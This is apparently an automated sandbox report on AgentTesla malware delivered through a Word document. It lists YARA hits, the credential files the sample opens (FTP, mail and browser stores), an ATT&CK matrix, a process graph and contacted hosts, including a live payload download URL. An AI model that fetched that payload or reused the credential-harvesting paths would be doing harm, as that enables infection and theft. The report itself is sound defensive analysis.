                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 11.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.35699f0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.34099f0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.330fd40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.35699f0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.3588720.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.346fd40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.34099f0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.35dfd40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.3418720.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.32b8720.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.507386874.000000000345F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.483487835.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.506532288.0000000003169000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.413796340.0000000003439000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 1184, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 2820, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2924, type: MEMORYSTR
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 2820, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2924, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 11.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.35699f0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.34099f0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.330fd40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.35699f0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.3588720.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.346fd40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.34099f0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.35dfd40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.newapp.exe.3418720.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.32b8720.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.507386874.000000000345F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.483487835.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.506532288.0000000003169000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.413796340.0000000003439000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 1184, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 2820, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2924, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Scheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSSecurity Software Discovery211Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 502702 Sample: Specification.doc Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 62 Found malware configuration 2->62 64 Yara detected AgentTesla 2->64 66 Yara detected AntiVM3 2->66 68 8 other signatures 2->68 7 EQNEDT32.EXE 11 2->7         started        12 newapp.exe 2 2->12         started        14 newapp.exe 2 2->14         started        16 WINWORD.EXE 290 23 2->16         started        process3 dnsIp4 58 sauberprint.com 143.95.246.178, 49165, 80 ASMALLORANGE1US United States 7->58 50 C:\Users\...\edufyrigefy4utwgqeoriufj4ce.exe, PE32 7->50 dropped 52 C:\Users\user\AppData\Local\...\booobb[1].exe, PE32 7->52 dropped 86 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->86 18 edufyrigefy4utwgqeoriufj4ce.exe 1 8 7->18         started        88 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->88 90 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->90 92 Injects a PE file into a foreign processes 12->92 22 newapp.exe 2 12->22         started        24 schtasks.exe 12->24         started        26 newapp.exe 14->26         started        29 schtasks.exe 14->29         started        31 newapp.exe 14->31         started        33 newapp.exe 14->33         started        file5 signatures6 process7 dnsIp8 42 C:\Users\user\AppData\Local\...\tmp7B0A.tmp, XML 18->42 dropped 44 C:\Users\user\AppData\...\yxnDFepLbf.exe, PE32 18->44 dropped 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->70 72 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->72 74 Uses schtasks.exe or at.exe to add and modify task schedules 18->74 76 Injects a PE file into a foreign processes 18->76 35 edufyrigefy4utwgqeoriufj4ce.exe 1 6 18->35         started        40 schtasks.exe 18->40         started        60 mail.privateemail.com 26->60 file9 signatures10 process11 dnsIp12 54 mail.privateemail.com 198.54.122.60, 49166, 49167, 49169 NAMECHEAP-NETUS United States 35->54 56 windowsupdate.s.llnwi.net 35->56 46 C:\Users\user\AppData\Roaming\...\newapp.exe, PE32 35->46 dropped 48 C:\Users\user\AppData\...\tmpG796.tmp (copy), PE32 35->48 dropped 78 Tries to steal Mail credentials (via file access) 35->78 80 Tries to harvest and steal ftp login credentials 35->80 82 Tries to harvest and steal browser information (history, passwords, etc) 35->82 84 2 other signatures 35->84 file13 signatures14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.newapp.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      17.2.newapp.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      sauberprint.com0%VirustotalBrowse
                      windowsupdate.s.llnwi.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.sia.it/secsrv/repository/CRL.der10%Avira URL Cloudsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.globaltrust.info0=0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                      http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl00%URL Reputationsafe
                      http://www.globaltrust.info00%URL Reputationsafe
                      https://www.catcert.net/verarrel0%URL Reputationsafe
                      http://www.disig.sk/ca0f0%URL Reputationsafe
                      http://www.sk.ee/juur/crl/00%URL Reputationsafe
                      http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://www.quovadis.bm00%URL Reputationsafe
                      http://www.trustdst.com/certificates/policy/ACES-index.html00%URL Reputationsafe
                      http://www.firmaprofesional.com00%URL Reputationsafe
                      https://www.netlock.net/docs0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl0%URL Reputationsafe
                      http://cps.chambersign.org/cps/publicnotaryroot.html00%URL Reputationsafe
                      http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
                      http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
                      http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
                      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                      http://www.acabogacia.org00%URL Reputationsafe
                      http://crt.sectigo.co0%Avira URL Cloudsafe
                      https://ca.sia.it/seccli/repository/CPS00%URL Reputationsafe
                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
                      http://sauberprint.com/lupin/booobb.exe0%Avira URL Cloudsafe
                      http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
                      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl00%URL Reputationsafe
                      http://Nbucou.com0%Avira URL Cloudsafe
                      http://www.valicert.com/10%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://OT3VeV4yt7mB0FaAlTS.org0%Avira URL Cloudsafe
                      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl00%URL Reputationsafe
                      https://ocsp.quovadisoffshore.com00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://cps.chambersign.org/cps/chambersignroot.html00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://ca.sia.it/secsrv/repository/CRL.der110%Avira URL Cloudsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://www.ancert.com/cps00%URL Reputationsafe
                      http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
                      http://www.echoworx.com/ca/root2/cps.pdf00%URL Reputationsafe
                      https://www.netlock.hu/docs/0%URL Reputationsafe
                      http://www.a-cert.at/certificate-policy.html0;0%URL Reputationsafe
                      http://www.crc.bg00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.privateemail.com
                      198.54.122.60
                      truefalse
                        high
                        sauberprint.com
                        143.95.246.178
                        truetrueunknown
                        windowsupdate.s.llnwi.net
                        178.79.242.128
                        truefalseunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://sauberprint.com/lupin/booobb.exetrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.a-cert.at0Eedufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.e-me.lv/repository0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.acabogacia.org/doc0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.chambersign.org/chambersroot.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.certifikat.dk/repository0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.chambersign.org1edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.diginotar.nl/cps/pkioverheid0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.pkioverheid.nl/policies/root-policy0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://repository.swisssign.com/0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpfalse
                          high
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.collada.org/2005/11/COLLADASchema9Doneedufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413103348.0000000000B80000.00000004.00020000.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crledufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ca.disig.sk/ca/crl/ca_disig.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://repository.infonotary.com/cps/qcps.html0$edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.post.trust.ie/reposit/cps.html0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516081669.0000000008844000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.disig.sk/ca/crl/ca_disig.crl0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ca.sia.it/secsrv/repository/CRL.der1edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.infonotary.com/responder.cgi0Vedufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sk.ee/cps/0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.globaltrust.info0=edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Eedufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameedufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483448349.0000000002476000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipedufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, newapp.exe, 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://servername/isapibackend.dlledufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.671412974.0000000007FE0000.00000002.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://www.ssc.lt/cps03edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://ocsp.pki.gva.es0edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
